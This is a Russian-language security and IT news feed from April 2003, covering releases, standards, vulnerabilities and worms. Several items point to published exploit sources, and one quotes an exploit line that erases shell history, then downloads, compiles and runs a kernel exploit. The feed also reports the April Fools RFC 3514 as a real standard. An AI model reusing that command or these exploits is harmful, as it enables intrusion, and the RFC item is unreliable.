Компания BioLink Technologies объявила об официальном открытии в компании нового направления, посвященного разработке биометрических элементов для систем контроля и управления физическим доступом. Работы по новому направлению проводит выделенная проектная группа, первый результатом деятельности которой стал выпуск нового продукта, нацеленного на внедрение биометрических технологий BioLink в системы контроля физического доступа, - BioLink OBE Module DDK версии 1.0. Новый продукт компании BioLink для систем контроля доступа представляет собой пакет для разработчиков и производителей СКД, построенный на базе дактилоскопического оптического сенсора BioLink. В комплект входят: дактилоскопический модуль BioLink OBE Module, состоящий из оптического сенсора BioLink и платы управления, комплекта конструкторско-технологической документации для разработки коммерческой реализации дактилоскопических элементов СКД, технической документации, программного обеспечения и макета платы управления электромеханическим замком с дисплеем и кодонаборной панелью для контроля выполнения управляющих команд. BioLink OBE Module DDK позволяет выполнять следующие операции: сканирование отпечатков пальцев, преобразование отпечатков пальцев в специальную математическую модель, хранение модели во внутренней памяти модуля, передача модели во внешнюю среду по интерфейсу RS-232/485 и поиск модели отсканированного отпечатка пальца. База данных моделей отпечатков пальцев во внутренней памяти модуля при его базовой комплектации рассчитана на хранение информации о 21 зарегистрированном пользователе. Возможно увеличение ее объема до 1 тысячи пользователей. Подробности - http://www.biolink.ru
5/04/2003 14:05 ГТК вводит новые ГОСТы по защите информации.
Государственная техническая комиссия при президенте России завершает апробацию новых ГОСТов в сфере безопасности информационных систем. Требования этих стандартов соответствуют Common Criteria, что расширяет возможности отечественных производителей ПО. Сертификаты, полученные в России, будут признаваться на международном уровне. Начальник управления Гостехкомиссии Юрий Лаврухин заявил, что они вступят в силу с 1 января 2004 г. Однако еще предстоит разработать около 20 нормативных документов. По словам Игоря Калайды, заместителя начальника отдела лицензирования и сертификации Гостехкомиссии России, пока разработаны 12 профилей и 2 требования. Они проходят апробацию и, после вступления в силу, полностью заменят старые ГОСТы. Прошло два года с тех пор, как было принято решение о разработке новых отечественных стандартов безопасности информационных систем. Тогда с этой целью была создана межведомственная рабочая группа, она проработала около полугода. Новые стандарты постепенно заменяли старые, и проходили, таким образом, апробацию. Как сообщил Игорь Калайда, 26 марта, Совет Безопасности России принял решение об их признании. После этого решения, на следующий день, 27 марта 2003 г., Гостехкомиссия России провела семинар-совещание для представителей государственных министерств, ведомств и институтов, где также присутствовали менеджеры ряда компаний. До участников были доведены предварительные результаты разработки и апробации нормативных документов, подготовленных в соответствии с методологией ГОСТ Р ИСО/МЭК 15408-2002 "Критерии оценки безопасности информационных технологий" (Общие критерии), а также перспективы и порядок использования этих нормативных документов и др. вопросы. В работе семинара приняли участие представители Аппарата Совета Безопасности РФ, комитета Государственной думы по безопасности, Госстандарта России, Минсвязи, Минатома, Минпромнауки, Минэкономразвития, ФАПСИ, ФСБ, Центробанка, ассоциаций и ведущих отечественных компаний-разработчиков средств защиты информации и защищенных систем обработки информации. C 1 января 2004 г. вступают в силу: ГОСТ Р ИСО/МЭК 15408-1-2002, ГОСТ Р ИСО/МЭК 15408-2-2002, ГОСТ Р ИСО/МЭК 15408-3-2002. Подробности - http://cnews.ru/newcom/index.shtml?2003/04/02/142688
5/04/2003 13:30 Выход FreeBSD 4.8.
3 апреля в форуме, посвящённом BSD-системам, один из разработчиков Murray Stokely анонсировал выход новой версии FreeBSD ветки STABLE - 4.8. Предыдущая версия - 4.7 была выпущена в октябре 2002 г. В новой версии обновлено программное обеспечение, включены различные обновления в части безопасности ОС, а также добавлена поддержка большого количества "железа", в том числе поддержка Firewire, HyperThreading и др. Поддерживаются платформы i386 и ALPHA. Новая версия FreeBSD доступна как на CD, так и для скачивания в виде ISO-образов с различных зеркал во многих странах мира, в том числе и в Росии. Подробности - http://www.freebsdforums.org/forums/showthread.php?threadid=8380
5/04/2003 12:33 Вышла новая версия "дров" для видеокарт от nVidia.
Как сообщает d()c с www.nnm.ru, вышла новая версия набора драйверов для видеокарт от nVidia - Detonator v43.45 для ОС Win 98/ME/XP/2K. Желающие могут их скачать по ссылке внизу. Для XP/2K - http://download.nvidia.com/Windows/43.45/43.45_win2kxp_english.exe Для 98/МЕ - http://download.nvidia.com/Windows/43.45/43.45_win9x_english.exe
5/04/2003 11:35 Калькулятор Тарифных Планов v1.51.
Утилита для обладателей мобильных телефонов. Она поможет выбрать оптимальный именно для Вас тарифный план. Введя приблизительный объем разговоров, а также кучу других параметров (количество звонков продолжительностью 1, 2, 3 минуты, процентное соотношение дневных/вечерних/ночных звонков, соотношение звонков на городские/мобильные телефоны и другие параметры), а также введя приблизительную месячную сумму расходов на мобильник, получаете сообщение, какой тарифный план вам будет наиболее выгоден. Также можно вывести сравнительную таблицу, в которой будет показано, какую сумму придётся потратить на это же количество разговоров при других тарифных планах. Таблицу можно распечатать на принтере или экспортировать в формат M$ Excel. Изначально в настройках уже есть масса различных тарифных планов МТС, ПчеЛайн, Мегафонище, SMARTS. Не нашли своего оператора в списке? Ерунда, операторов можно добавлять, равно как и добавлять и редактировать сами тарифные планы. Информация получена с www.nnm.ru. Программу скачать здечь: http://ktp.by.ru/ktp.exe
5/04/2003 11:15 30 лет со дня первой демонстрации сотового телефона.
3 апреля 2003 г. исполнилось ровно 30 лет со дня первой демонстрации сотового телефона. Мартин Купер, исследователь из компании Motorola совершил первый звонок с угла 56-ой Стрит и Лексингтон Авеню в Манхэттене 3 апреля 1973 года. Очевидцы стояли разинув рот, вспоминает Купер. Телефон был просто огромным, он весил почти килограмм, был 25 сантиметров в длину, и время разговора составляло 20 минут. Но все-таки это был огромный шаг вперед по сравнению с телефонами, которые устанавливали в автомобилях с сороковых годов. Целью этой демонстрации было отнюдь не желание поразить жителей Нью-Йорка. Motorola хотела показать свое видение мобильной связи, отличное от точки зрения компании AT&T, которая отдавала предпочтение автомобильным телефонам. Купер звонил Джоэлу Энгелу, главе исследовательской лаборатории в AT&Ts Bell Labs. “Я сказал ему: Джоэл, я звоню тебе с НАСТОЯЩЕГО сотового телефона” – вспоминает Купер. “Я думал, что услышу зубовный скрежет на другом конце, но он был сдержан”. Вскоре после этого FCC выделила частотный диапазон и десятью годами позже начала действовать первая коммерческая сотовая сеть. Купер, которому сейчас 74 года, является президентом ArrayComm в Сан-Хосе, Калифорния, компании, которая хочет сделать очередной прорыв в беспроводных технологиях: так называемые “умные” антенны. Источник - http://www.mobile-review.com
5/04/2003 10:39 RIAA подала в суд на четырех студентов американских вузов.
Американская ассоциация звукозаписывающих компаний, известная свои непримиримым отношением к распространению музыки в формате MP3, инициировала новый судебный процесс. На этот раз ответчиками стали четверо студентов американских вузов, которые организовали в университетских городках собственные компьютерные сети и обменивались через них музыкой. Схема работы таких сетей напоминала архитектуру пиринговой сети Napster, уничтоженной RIAA. Такие действия в RIAA оценивают как пиратство. Эти сети были доступны всем студентам университета, и по мнению RIAA, их существование противоречит законам об авторском праве. Всего по иску RIAA перед судом предстанут четверо студентов: Джесси Джордан и Аарон Шерман из Ренсселлерского политехнического института, Дэниел Пен из Принстонского университета и Джозеф Нивельт из Мичиганского технического университета. В четырех организованных студентами сетях в свободном доступе находились 2,5 млн. файлов, один миллион из которых располагались в самой крупной сети. От четырех студентов RIAA требует прекращения работы "мининапстеров" и выплаты компенсаций в размере 150 тысяч долларов за каждый нарушенный копирайт. Источник - http://www.compulenta.ru
4/04/2003 15:25 Обновлённый эксплоит уязвимости в Apache с OpenSSL.
Обновился эксплоит уязвимости Вэб-сервера Apache c установленной поддержкой SSL. Теперь он называется OpenFuckV2. Как я понял - увеличилось количество "поддерживаемых" платформ. :) Для получения дополнительных адресов рекомендуется применить: objdump -R /usr/sbin/httpd|grep free. В самом исходнике меня нексолько настрожило присутствие вот этой строки: #define COMMAND2 "unset HISTFILE; cd /tmp; wget http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n". Хотя, возможно, это посто проверка функционирования удалённого шелла. Но таким вот образом скачивается и потом компилируется эксплоит уязвимости в ядре Linux в системном вызове ptrace() (мы писали ранее об этой уязвимости). Естественно, для компиляции необходимо иметь библиотеку openssl. Исходник - http://packetstorm.linuxsecurity.com/0304-exploits/OpenFuckV2.c
4/04/2003 14:54 Эксплоит уязвимости в RPC Locator Service в Win2K.
Опубликован эксплоит, использующий уязвимость в RPC Locator Service в Win2K. Как пишет автор (имя которого почему-то не указано в исходнике), для компиляции необходимо иметь: SDK для платформы MS (например, August SDK), компилятор (MS Visual C++ 6.0) и библиотеку rpcns4.lib для линковки. Процедура запуска эксплоита достаточно подробно расписана в самом эксплоите. Порождает шелл на порту 5151 удалённого хоста. Применяется только против Windows 2000 Sp3 и Windows NT 4 Sp6a. Эксплоит - http://packetstorm.linuxsecurity.com/0304-exploits/rpcexp.c
4/04/2003 14:31 Новости команды UINC.
Нашей команде требуются 4 человека для выполнения следующей работы: 1. Заполнение и поддержание раздела FTP-сервера, посвящённого программированию. 2. Заполнение и поддержание раздела FTP-сервера, посвящённого крекерству. 3. Человек, разбирающийся в вопросах бэкапов и клонирований систем для обновления статьи про восстановление Windows. 4. Дизайнер для оформления нового сайта и программ. Кроме того, принимаются на рассмотрение и дальнейшее опубликование статьи, соответствующие тематике нашего сайта. По всем вопросам Вы можете связываться с нами по адресу web@uinc.ru С уважением. Команда UINC
4/04/2003 12:03 Microsoft намерена составить конкуренцию Google.
Поисковику Google, ставшему настолько популярным, что пользователи глагол «искать» заменяют глаголом «гуглить», вскоре придется потесниться, объявила в среду корпорация Microsoft. «Google для нас с каждым днем становится все более сильным конкурентом. Но мы уверены, что сможем предложить потребителю продукт лучшего качества. Именно над этим сейчас работают наши специалисты», — сказал в интервью агентству Reuters Боб Висс (Bob Visse), директор по маркетингу подразделения MSN Internet Services. Корпорация Microsoft уже сделала крупные финансовые вложения в разработку более совершенного поискового механизма, но конкретный план пока не сформулирован. Связаться с представителями Google для получения комментариев пока не удалось. Нужно сказать, наступление на этот сегмент рынка начал не Microsoft. В прошлом месяце компания Yahoo! совершила сделку в 235 миллионов долларов по приобретению поисковой системы Inktomi. Источник - http://www.webplanet.ru
4/04/2003 11:38 Cтатья " Программирование на Shell (Unix)".
Благодаря Руслану Иванову, ака Rend в форуме RTFM (www.sysadmins.ru) обнаружена статья "Программирование на Shell (Unix)", опубликованная на сайте www.linuxcenter.ru. Посвящена программированию для оболочки Борна (Borne shell). Будет полезна начинающим администраторам и пользователям UNIX. Cтатья - http://www.linuxcenter.ru:8081/book/bk5/index.phtml
4/04/2003 11:02 Phoenix восстал из пепла Mozilla.
Спустя три месяца после того, как Apple Computer предпочла веб-браузеру Mozilla более компактный и быстродействующий продукт, Mozilla.org решила переориентировать разработчиков на уменьшение размеров и повышение быстродействия своего собственного кода. В новом плане Mozilla.org, группы разработчиков ПО с открытым исходным кодом AOL Time Warner, значится, что следующая версия браузера должна быть основана на версии Phoenix, вышедшей в сентябре 2002 года. По новому плану Mozilla отказывается от своего инструментария XPFE для создания пользовательского интерфейса. Вместо этого основной код браузера будет взят из проекта Phoenix, упрощенной версии Mozilla, написанной на языке Extensible User Interface Language (XUL). В отличие от платформно-ориентированных языков программирования, XUL, предложенный четыре года назад инженерами Netscape и Mozilla, наделяет браузер исключительно стандартными веб-технологиями. Цель нового курса в том, чтобы сократить основной код Mozilla, который как критики, так и участники проекта называют слишком громоздким и неповоротливым. Подробности - http://www.zdnet.ru/?ID=298664
4/04/2003 10:29 Язык C# стандартизирован организацией ISO.
Корпорация Microsoft сообщила о том, что разработанный ею язык C# и технология CLI (common language infrastructure) сертифицированы Международной организацией по стандартизации (ISO). Таким образом, две эти разработки Microsoft получили статус международных стандартов. Заявку на стандартизацию C# и CLI софтверный гигант подал в прошлом году, а теперь ISO выпустила спецификации этих технологий в виде полноценного стандарта. Как известно, C# и CLI являются альтернативой технологии Java, продвигаемой компанией Sun Microsystems. В отличие от Java, C# и CLI не являются мультиплатформенными технологиями, а тесно привязаны к инфраструктуре .Net, работающей исключительно в среде Windows. При этом Sun не обращалась в международные организации, вроде ISO, с целью стандартизации спецификаций Java. Вместо этого, Sun и ее партнеры создали специальную структуру Java Community Process, которая координирует процесс создания спецификаций на данную технологию. Источник - http://www.informationweek.com/
4/04/2003 10:01 Операционная система Microsoft для 64-разрядных процессоров AMD.
На выставке CeBIT 2003, проходившей в марте в немецком городе Ганновере, обозревателям британского интернет-издания Inquirer удалось увидеть версию операционной системы Microsoft, предназначенную для 64-разрядных процессоров AMD. Несмотря на это, официальные представители Microsoft и AMD опровергают существование такой ОС. Около двух недель спустя в распоряжение Inquirer попала информация, подтверждающая, что предварительные версии операционной системы Microsoft для процессоров AMD c набором инструкций X86-64 уже выпущены. Кроме того, продолжается работа над совершенствованием этой ОС, которая получила кодовое название Anvil ("наковальня"). Операционная система Anvil будет работать как с серверными процессорами Opteron, так и с процессорами Athlon 64 для настольных компьютеров. По данным Inquirer, восьмого апреля на конференции для специалистов ведущие программисты Microsoft Клайд Родригес, Форрест Фольц и Дэйв Катлер будут делиться с коллегами информацией об Anvil. Представители Microsoft намерены рассказать о планах по выпуску Anvil и других 64-разрядных версий Windows, поведать некоторые подробности об архитектуре операционных систем и процессоров, а также о портировании, тестировании и отладке программ для них. Источник - http://www.theinquirer.net/
3/04/2003 13:38 Уязвимости в Opera и Netscape.
Ранее мы сообщали об уязвимости в броузерах при вызове Джава-методов из Javascript. Вчера поступило письмо от испанца David F.Madrid с анализом подобной уязвимости в броузерах Opera и Netscape. В Opera 6.01 существует возможность вызова Java exec-функции, которая позволяет выполнить команду, передаваемую ей в качестве аргумента. Исследуя эту возможность, автор написал скрипт, позволяющий запустить калькулятор на локальной машине, а также скрипт (verifier.exe), вызывающий переполнение буфера на Win2K/XP с последующим выполнением любой команды на машине пользовтеля с его привилегиями. Также была замечена возможность определения локального IP-адреса из скрипта ( var host=java.net.InetAddress.getLocalHost();) с возможностью осуществления дальнейшего подключения к произвольному порту локального IP. Opera 7.02 и Netscape 7.02 также обладают подобными уязвимостями. Всё вышеописанное позволяет выполнять от имени машины клиента, посетившего Вэб-страницу, специальным образом оформленную довольно любопытные вещи, вплоть до отсылки пакетов от имени машины клиента. Подробности - http://www.securityfocus.com/archive/1/317240/2003-03-27/2003-04-02/0
3/04/2003 13:07 Уязвимость в терминальных сервисах Windows.
Шведская компания Cendio Systems в процессе исследования протокола RDP (RDP) обнаружила уязвимость терминального сервиса Microsoft (Windows Terminal Services) к атакам типа MITM (Man In The Middle). Природа уязвимости связана с тем, что, несмотря на то, что весь траффик между клиентом и сервером шифруется, не производится проверка подлинности сервера на этапа установления соединения и начального обмена ключами. Это позволяет машине злоумышленнника на этапе инициализации крипто-сессии вклиниться в посредником в криптозащищённый канал. Для осуществления атаки можно использовать методы DNS spoofing, ARP poisioning, etc. В процессе имитации атаки, использующей эту уязвимость проверялись: Windows 2000 Terminal Server, Windows 2000 Advanced Server, Windows Server 2003 с клиентами из Windows 2000 и RDP-клиентом с сайта Microsoft. Компанией также разработано ПО, позволяющее организовать подобную атаку, однако пока его не выпустили для широкой публики. Microsoft оповещена и ответила, что "в настоящее время проблема изучается". Подробности - http://www.securityfocus.com/archive/1/317244/2003-03-27/2003-04-02/0
3/04/2003 10:05 Выход Apache 2.0.45.
Lars Eilebrecht от имени Apache Software Foundation объявил о выпуске новой версии популярного Вэб-сервера Apache ветки 2.х. Как пишет сам автор в этой версии устранены 2 уязвимости, а также различные баги, обнаруженные в работе предыдущей версии (2.0.45). Первая уязвимость была обнаружена Дэвидом Эндлером из iDefense и заключается в возможности проведения атаки типа DoS на все версии Apache 2.0 - 2.0.45. Подробности уязвимости пока не раскрываются, однако говорится, что она будет опубликована 7 апреля. Вторая уязвимость связана с утечкой информации о важных дескрипторах файлов, которая может быть доступна дочерним (child) процессам, которыми, по отношению к процессу httpd, явлаются CGI-скрипты. Уязвимость была обнаружена Christian Kratzer и Bjoern A. Zeeb. В анонсе подчёркивается, что для серверов под управлением OS/2 остаётся возможность проведения DoS-атаки, описанной ранее Robert Howard и она будет устранена полностью только в следующей версии - 2.0.46. Пока же пользователям "полуоси" рекомендуют применить патч, также выложенный на сайте производителя. Подробности - http://www.apache.org/dist/httpd/Announcement2.html
3/04/2003 09:28 Выход OpenSSH 3.6.1.
Вчера мы писали о выходе версии 3.6 OpenSSH. Однако сразу после выхода новой версии был обнаружен довольно неприятный баг в поддержке протокола SSH v2. Багофикс, названный 'kex guesses' приводил к тому, что при работе с этой версией SSH соединение зависало. В новой версии - OpenSSH 3.6.1 сделано исправление, суть которого заключается в отключении этого багофикса при работе со второй версией SSH. Подробности - http://www.openssh.com/
3/04/2003 09:22 Повышена точность определения местоположения GSM-абонента.
Английский разработчик систем позиционирования Cambridge Positioning Systems представил новое решение, позволяющее добиться высокой точности определения географических координат любого абонента GSM-сетей без дополнительных аппаратных модулей (в отличие от системы GPS). С помощью технологии Cursor Matrix операторы связи могут предоставлять новые виды услуг, основанных на местоположении клиента, определяя его координаты с точностью до 50 метров. При этом компаниям не требуется модернизировать существующие базовые станции, а абоненты могут продолжать пользоваться обыкновенными трубками. Все функции Cursor Matrix реализованы на программном уровне, то есть для введения в эксплуатацию новых сервисов оператору будет достаточно установить на своих станциях новое ПО, а также специальный софт будет загружен в память телефонов тех абонентов, которые подпишутся на новые услуги. В настоящее время многие GSM-компании предоставляют сервисы, связанные с местоположением абонента, на базе технологии Cell-ID, которая способна всего лишь определить, к какой базовой станции ближе всего находится клиент. Таким образом, точность этой системы колеблется от 500 метров до нескольких километров. Источник - http://www.cnews.ru
3/04/2003 09:09 Иракский аспект нигерийской аферы.
Война в Ираке предоставила киберпреступникам новые возможности для интернет-преступлений. Многие уже успели столкнуться с червем Ganda, спекулирующим на иракской военной тематике. Взломаны тысячи сайтов, имеющие отношение к иракскому конфликту. Теперь в новом контексте выступила печально известная нигерийская афера. Нигерийская афера также известна как "аферa 419". Это спам, который в огромном количестве рассылался на ящики пользователей. В своих письмах мошенники просили помочь переправить из Нигерии за вознаграждение крупную сумму денег и соблазняли жертву пойти на небольшие расходы, которые якобы будут возмещены позднее при личной встрече для передачи комиссионных. Так как нигерийская афера стала довольно известной, людей, которые бы 'купились' на ее призывы, стало всё меньше. Включив иракскую тематику, мошенники надеются, что это принесет новые прибыли. Последняя уловка - предложение некого иракского землевладельца Фарука Аль-Башара, который якобы стремится перевести накопления семьи из Багдада в более безопасное место. Если вы получили такое письмо - лучше всего сообщите о нем компании-провайдеру отправителя и помните - то, что вам предлагают, слишком хорошо, чтобы быть правдой. Источник - http://www.viruslist.ru
2/04/2003 18:00 Microsoft повышает безопасность беспроводных сетей.
Корпорация Microsoft объявила о выпуске обновления для ОС Windows XP, в котором реализована поддержка нового протокола WPA (Wi-Fi Protected Access), предназначенного для защиты информации в беспроводных сетях Wi-Fi. Данный стандарт разработан и принят организацией Wi-Fi Alliance на замену стандарту WEP (Wired Equivalent Privacy), который оказался чересчур уязвимым для разного рода атак. Низкая эффективность защиты информации при использовании WEP до сих пор сдерживает внедрение беспроводных сетей во многих компаниях, государственных и некоммерческих организациях. WPA значительно повышает безопасность передачи данных по беспроводным сетям. Во-первых, для шифрования информации каждому устройству в сети присваивается собственный ключ, который, к тому же, меняется через определенные интервалы времени. В случае WEP для шифрования использовался единственный постоянный ключ, что, конечно, негативно отражалось на безопасности. Кроме того, в WPA применяется более стойкий шифр, чем в WEP. Подробнее - http://support.microsoft.com/?kbid=815485
2/04/2003 17:54 Выход RedHat 9.
Компания Red Hat объявила о выходе новой версии своего дистрибутива Linux, ориентированного на индивидуальных пользователей. Red Hat Linux 9 базируется на ядре 2.4.20 и обновленных версиях других важных компонентов - GCC 3.2.1 и GNU libc 2.3. В состав дистрибутива вошли веб-сервер Apache 2.0, офисный пакет OpenOffice.org, браузер Mozilla, электронный ежедневник Ximian Evolution, пакет CUPS для организации печати документов методом drag-and-drop и многие другие приложения. Кроме того, в Red Hat Linux 9 реализована усовершенствованная версия графического пользовательского интерфейса Bluecurve, улучшена программа установки и конфигурирования системы. Как уже отмечалось, новый дистрибутив предназначен для индивидуальных пользователей, прежде всего, студентов и компьютерных энтузиастов-линуксоидов. Стоимость стандартной версии в комплекте с тридцатидневной технической поддержкой составит 39,95 долл. США, а за профессиональный вариант, поставляющийся на DVD в комплекте с инструментарием для восстановления системы, диском с мультимедийными и офисными программами и 60-дневной техподдержкой, придется выложить 149,95 долл. Пока Red Hat Linux 9 распространяется только среди членов сообщества Red Hat Network. Широкая продажа нового дистрибутива начнется 7 апреля. Начиная с этого времени, его можно будет бесплатно скачать из интернета, но о технической поддержке в этом случае придется забыть. Подробнее - http://www.redhat.com
2/04/2003 16:25 Червь "Cult.b" прикидывается почтовой открыткой от BlueMountain.com.
В сети обнаружен интернет-червь "Cult.b", который представляет собой приложение Windows (PE EXE-файл) размером около 16K в неупакованном виде или 9K, если упакован UPX (обнаружены оба варианта червя) и распространяется через интернет в виде файлов, прикрепленных к зараженным письмам и через сеть обмена файлами Kazaa. При запуске своего EXE-файла "Cult.b" копирует себя в системный каталог Windows с именем "wuauqmr.exe". Червь также создаёт файл "awqewqed.dll" в системном каталоге Windows и записывает в файл себя в кодировке MIME. Данный файл затем используется червём при рассылке писем. Зараженные письма содержат поля: Subject: Hi, I sent you an eCard from BlueMountain.com Текст: To view your eCard, open the attachment... "Cult.b" активизируется только если пользователь сам запускает зараженные файл (при двойном щелчке на вложении). Затем червь инсталлирует себя в систему и запускает процедуры своего распространения. Червь создаёт в системном каталоге Windows подкаталог "jdfghtrg" и копирует себя туда с различными именами, затем каталог "jdfghtrg" регистрируется как каталог обмена файлов сети Kazaa. Помимо прочих "радостей", "Cult.b" организует DoS-атаку на два сервера: chat.planet.nl и www.chat-planet.nl Источник - http://www.viruslist.ru
2/04/2003 13:17 Справочное руководство по MySQL.
Благодаря Руслану Иванову ака Rend с форума RTFM (www.sysdamins.ru), обнаружено руководство по MySQL на русском языке. Представляет собой документацию по MySQL версии 4.0.12-Production. Руководство часто обновляется, поскольку ПО СУБД MySQL находится в состоянии постоянного развития. Изначально написано Дэвидом Аксмарком (David Axmark) и Майклом (Монти) Видениусом (Michael (Monty) Widenius). Руководство - http://www.mysql.com/doc/ru/index.html
2/04/2003 12:25 WebMoney защищает ПО от несанкционированного использования.
Система WebMoney Transfer объявила о начале работы нового сервиса Software Activation Service, с помощью которого авторы программного обеспечения, использующие системы защиты HardKey System и ASProtect, смогут устанавливать и автоматически контролировать возможное количество активаций регистрационных кодов распространяемых ими программ. Разработчику достаточно иметь реквизиты в системе WebMoney Transfer и пройти бесплатную регистрацию на сайте сервиса, после чего он сможет управлять продажами своих программных продуктов, настраивая политику их активаций, то есть указывая, сколько раз пользователю будет разрешено использовать регистрационный код, который он получил при покупке. В процессе активации в сервис поступает специальный код, содержащий данные, уникальные для каждого компьютера, программы и WM-идентификатора, таким образом дублирование кода активации на другом компьютере не позволит запустить нелицензионную копию программы. Кроме того, сервис является решением в таких ситуациях, как переустановка системы или смена сетевой карты, приводящих к смене HardwareID (идентификатора компьютера) в случае построения защиты программы общепринятыми способами. Источник - http://www.cnews.ru
2/04/2003 10:18 Уязвимость в QuickTime Player.
Компания iDEFENSE сообщает об обнаружении уязвимости в популярном медиа-плеере QuickTime Player, выпускаемом и поддерживаемом для платформ Windows и Mac компанией Apple Computer Inc. Возможность переполнения буфера была обнаружена в механизме обработки URL, ссылающемся на медиа-файл для проигрывания QuickTime Player. Перенаправить броузер для проигрывания этого файла можно, сформировав URL вида quicktime://. Та же самая процедура выполняется при помощи ключи -u, задаваемом в ключе реестра HKEY_CLASSES_ROOT/quicktime. Было замечено, что в случае задания URL длиной в 400 символов происходит перезапуск пространства памяти стека с последующей перезаписью сохранённого указателя интрукций (регистр EIP). Это позволяет удалённому злоумышленнику получить контроль над машиной жертвы. Уязвимость присутствует в версии плеера 5.х/6.0 для платформы Windows. В качестве временной меры рекомендуется убрать ключ HKEY_CLASSES_ROOT/quicktime или(и) убрать переключатель (плагин) QuickTime в броузере. Apple выпущена версия QuickTime Player 6.1 для платформы Windows. Подробности - http://www.idefense.com/advisory/03.31.03.txt
2/04/2003 10:01 Эксплоит уязвимости в BitchX/Epic-клиентах.
eSDee из Netric Security опубликован исходный текст эксплоита, использующего уязвимости клиентов IRC-сетей BitchX и Epic (обычно применяются на *nix-системах). Эксплоит, используя уязвимость в этих клиентах, открывает шелл на удалённой машине на порту 45295. Эксплоит - http://www.security.nnov.ru/files/gespuis.c
2/04/2003 09:48 Локальные уязвимости в Solaris.
Как сообщает NSFOCUS Security Team, в ОС Solaris, выпускаемой фирмой Sun Microsystems существуют 2 локальные уязвимости, используя которые пользователь имеет возможность повысить свои полномочия в системе до статуса суперпользователя. Первая из них связана с утилитой lpq, предназначенной для просмотра очереди печати. Функция bsd_queue() в lpq обращается к системному вызову strcat() для копирования данных, вводимых пользователей (печатаемый документ, например) в буфер, размер которого является фиксированным, однако проверка размера буфера в программе не производится и, таким образом, введя данные, превышающие границы буфера, злоумышленник может вызвать переполнение стека буфера. Переписав адрес возврата и другие данные в стеке, локальный пользователь может получить привилегии суперпользователя. Уявзимость присутствует в версиях Solaris 2.5.1, 2.6, 7 для x86-платформы. Версии 8 и 9 уязвимости не подвержены ввиду другой реализации strlcat(). Вторая уязвимость в Solaris связана dtsession - менеджером сессии среды CDE (Common Desktop Environment). Этот менеджер имеет права с выставленным битом SUID root. В dtsession существует уязвимость, связаннная с некорректной проверкой длины переменной среды HOME, что позволяет злоумышленнику переполнить буфер кучи (heap buffer) и (из-за начилия бита SUID) получить полномочия root. В качестве временной меры рекомендуется снять бит SUID: chmod a-s /usr/dt/bin/dtsession (со всеми вытекающими отсюда последующими ограничениями дальнейшей работы). Этой уязвимости подвержены версии Solaris 2.6, 7, 8, 9 для обоих платформ (Sparc и x86). Sun выпущены патчи, перекрывающие обе уязвимости. Подробности - http://www.nsfocus.com
2/04/2003 08:40 Выход OpenSSH 3.6.
Объявлено о выходе новой версии OpenSSH 3.6. OpenSSH является 100% совместимым c SSH-протоколом версий 1.3, 1.5 и 2.0 и включает в себя поддержку клиента и сервера sftp. Основное изменение (помимо прочих доработок) сделано в части алгоритма генерации RSA-ключей - применяется так называемый RSA blinding алгоритм в компонентах ssh(1), sshd(8) и ssh-agent(1). Это поможет избежать появившейся недавно атаки на ключи RSA под названием OpenSSL/TLS timing attack (описан в http://crypto.stanford.edu/~dabo/papers/ssl-timing.pdf). Cайт проекта - http://www.openssh.com/
1/04/2003 23:53 Обзор вирусной активности (март 2003).
"Лаборатория Касперского" опубликовала мартовский обзор вирусной активности за март, предупредив при этом, что он не имеет никакого отношения к 1 апреля (кроме даты выхода, естественно). Итак, на первом месте с большим отрывом червь Klez - 37,60%, на втором месте червь Sobig - 10,75%, на третьем - червь Lentin - 9,03%. Отмечается, что среди общего количества вредоносных программ черви составляют 79,89%, вирусы - 14,05%, а троянцы - 6,06%. Подробнее - http://www.kaspersky.ru/news.html?id=1227934
1/04/2003 19:46 Анализатор дыхания в телефоне.
Компания Virgin Mobile собирается выпустить телефон со встроенным устройством для получения пробы на алкоголь. Телефон рассчитан отнюдь не на предотвращение случаев вождения автомобиля в нетрезвом состоянии, он должен помочь тем, кто, будучи в подпитии любит названивать всем подряд ночь напролет, а утром мучается угрызениями совести, вспоминая, чего он там наболтал. Если норма выпитого будет превышена, анализатор просто заблокирует телефон. Решение конечно интересное, но сколько денег потеряют операторы, если все любители выпить начнут приобретать такие телефоны. Источник - http://www.mobile-review.com
1/04/2003 19:41 Модуль для защиты от уязвимости в Linux.
Netric Security выпущен шелл-скрипт, внутри которого находится компилируемый исходник модуля для защиты от уязвимости в ОС Linux, которая связана с уязвимостью в ptrace. Может применяться как альтернатива латания ядра Linux, уязвимого для подобной локальной атаки. Исходник - http://packetstorm.linuxsecurity.com/linux/reverse-engineering/anti-ptrace.txt
1/04/2003 19:29 Новый RFC поможет бороться с хакерами.
Выпущен новый RFC 3514, при помощи которого файрволлы, IDS и другие системы определения попыток взлома будут бороться с хакерскими атаками, в которых подменён адрес источника (спуффинг). Для этого решено задействовать дополнительный бит в поле флагов, которому присвоено название Security Flag. Если флаг не установлен (0) - файрволлы не предпринимают защитных действий, поскольку это означает, что содержимое пакета не представляет опасности. Однако, если значение флага установлено в "1" - файрволлы и IDS включают в действие весь свой защитный арсенал для противодействия атаки, системы, не защищённые файрволлами и IDS, должны сразу падать. Для поддержки нового флага всем разработчикам предписывается изменить API, предназначенные для работы с сетевыми приложениями. Подробности - ftp://ftp.rfc-editor.org/in-notes/rfc3514.txt
1/04/2003 19:03 Используюешь файрволл - добро пожаловать в тюрьму!
Штаты Техас и Массачусетс посчитали, что изветсный Акт DMCA (Digital Millennium Copyright Act) недостаточно строг и решили принять билли, который тут же окрестили Super-DMCA Bills. Суть сего нововведения в том, что используя файрволл с NAT, либо обмениваясь почтой по зашифрованному каналу - Вы тем самым нарушаете новый билль, который запрещает в пакетах скрывать адреса отправителя и получателя (как почтовые, так и IP). Так как большинство файрволлов использует функцию трансляции адресов (NAT) - тем самым все файрволлы попадают в категорию незаконных продуктов. Более того, в эту же категорию попадают многие операционные системы (в том числе и различные версии Windows), поскольку в них той или иной степени поддерживаются функции трансляции адресов. В дальнейшем к биллю присоединились ещё 6 Штатов США: Южная Каролина, Флорида, Джорджия, Аляска, Тенесси и Колорадо. Сдаётся, что-то не в порядке с мозгами в "оплоте демократии". Самое печальное, что это не первоапрельская шутка, поскольку сообщение датировано 26 марта. Подробности - http://www.freedom-to-tinker.com/archives/000336.html
1/04/2003 18:51 Внимание! Новый вирус угрожает человеку!
